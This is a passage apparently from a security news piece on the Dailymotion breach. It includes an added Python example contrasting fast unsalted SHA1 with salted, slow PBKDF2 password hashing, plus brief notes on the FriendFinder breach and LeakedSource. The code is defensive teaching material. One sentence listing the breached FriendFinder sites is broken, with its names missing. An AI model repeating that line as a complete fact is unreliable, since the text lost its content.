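The difference the two paragraphs above describe, between a fast unsalted hash and a slow salted one, is easy to see in code. The following is an added example, not code from Dailymotion or the article. bcrypt itself is not in the Python standard library, so PBKDF2-HMAC-SHA256 from `hashlib` stands in for it here: like bcrypt it is salted and has a tunable work factor, unlike plain MD5 or SHA1. The iteration count is an assumed value, and `cost_ratio` measures how many SHA1 guesses fit in the time of one PBKDF2 guess on whatever machine runs it.

```python
"""Why bcrypt-style hashing slows password cracking after a breach.

Added example, not from the article. bcrypt is not in the standard library,
so PBKDF2-HMAC-SHA256 stands in for it: salted, with a tunable work factor.
"""
import hashlib
import hmac
import os
import time
from typing import Optional

PBKDF2_ITERATIONS = 200_000  # assumed work factor; raise it as hardware gets faster


def fast_hash(password: str) -> str:
    """Unsalted SHA1, as used by weaker breached sites: a guess costs microseconds,
    and identical passwords produce identical digests (so one lookup table fits all)."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def slow_hash(password: str, salt: Optional[bytes] = None,
              iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, iterated hash in a self-describing format:
    pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_slow(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, _digest = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    candidate = slow_hash(password, bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, stored)


def cost_ratio(iterations: int = PBKDF2_ITERATIONS, fast_samples: int = 2000) -> float:
    """How many SHA1 guesses fit in the time of one PBKDF2 guess on this machine."""
    start = time.perf_counter()
    for i in range(fast_samples):
        fast_hash(f"guess{i}")
    fast_per_guess = (time.perf_counter() - start) / fast_samples
    start = time.perf_counter()
    slow_hash("guess", b"\x00" * 16, iterations)  # fixed salt: timing only
    slow_per_guess = time.perf_counter() - start
    return slow_per_guess / fast_per_guess


if __name__ == "__main__":
    stored = slow_hash("correct horse battery staple")
    print("stored:", stored)
    print("right password verifies:", verify_slow("correct horse battery staple", stored))
    print("wrong password verifies:", verify_slow("password", stored))
    print("same password, same SHA1?", fast_hash("hunter2") == fast_hash("hunter2"))
    print("same password, same PBKDF2?", slow_hash("hunter2") == slow_hash("hunter2"))
    print(f"one PBKDF2 guess costs about {cost_ratio():,.0f} SHA1 guesses")
```

Two things to notice: the per-password salt means the same password stored for two users yields two different records, so each hash has to be attacked on its own; and the work factor is stored with the hash, so a site can raise it over time without invalidating old records. That is the "extremely slow" property the article credits bcrypt with, and it is why 18 million bcrypt hashes are a much smaller problem than 18 million MD5 hashes.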

None of the email addresses in the sample list provided to Salted Hash responded to questions about the Dailymotion hack.

Last month, Salted Hash broke the story that 412 million FriendFinder Networks accounts were compromised, after LeakedSource provided additional details from the October incident. The compromised records were in six databases used on,,,, and

Since opening, LeakedSource has added nearly 3 billion records to its database.